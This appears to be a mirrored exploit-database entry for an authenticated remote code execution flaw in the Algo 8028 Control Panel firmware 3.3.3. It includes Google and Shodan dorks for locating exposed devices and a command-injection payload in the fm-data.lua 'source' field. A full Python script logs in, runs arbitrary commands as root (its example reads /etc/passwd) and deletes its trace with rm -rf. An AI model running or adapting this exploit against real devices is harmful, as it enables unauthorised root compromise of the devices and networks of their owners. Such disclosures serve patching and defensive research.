Algo 8028 Control Panel Exploit, Remote Code Execution (RCE) (Authenticated)

# Exploit Title: Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:"Algo 8028 Control Panel"
# Shodan: title:"Algo 8028 Control Panel"
# Date: 2022-06-07
# Exploit Author: Filip Carlsson
# Vendor Homepage: https://www.algosolutions.com/
# Software Link: https://www.algosolutions.com/firmware-downloads/8028-firmware-selection/
# Version: 3.3.3
# Tested on: Version 3.3.3
# CVE : N/A
# Exploit:

# Due to bad sanitation in http://<IP:PORT>/control/fm-data.lua you can do command injection as root
# Request: POST
# Formdata:
# action: rename
# source: /a";echo $(id) 2>&1 > /opt/algo/web/root/cmd.txt;"
# target: /

#!/usr/bin/env python3
import sys
import requests

cookie=None

def main():
    # check if provided 3 args
    if len(sys.argv) != 4:
        print_help()
        return
    else:
        host = sys.argv[1]
        password = sys.argv[2]
        command = sys.argv[3]

        if login(host, password):
            # if login was successful, send command
            send_command(host, command)

def print_help():
    print("Usage: algo.py 192.168.1.123 password command")
    print("Example: algo.py 192.168.123 algo \"cat /etc/passwd\"")

def login(host, password):
    url = f"http://{host}/index.lua"
    data = {"pwd": password}
    res = requests.post(url, data=data)

    # check if html contains "Invalid Password"
    if "Invalid Password" in res.text:
        print("Invalid password")
        return False
    else:
        # save cookie
        global cookie
        cookie = res.cookies
        print("Successfully logged in\n")
        return True

def send_command(host, command):
    url = f"http://{host}/control/fm-data.lua"
    data = {"action": "rename", "source": f"/a\";echo $({command}) 2>&1 > /opt/algo/web/root/a.txt;\"", "target": "/"}
    res = requests.post(url, data=data, cookies=cookie)

    # get http://host/cmd.txt
    url = f"http://{host}/a.txt"
    res = requests.get(url)

    # if "404 Not Found" in text then command was not executed
    if "404 Not Found" in res.text:
        print("Command was not executed (404)")
    else:
        print(res.text)

    # delete cmd.txt
    url = f"http://{host}/control/fm-data.lua"
    data = {"action": "rename", "source": f"/a\";$(rm -rf /opt/algo/web/root/a.txt);\"", "target": "/"}
    requests.post(url, data=data, cookies=cookie)

if __name__ == "__main__":
    main()

All rights reserved nPulse.net 2009 - 2022
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD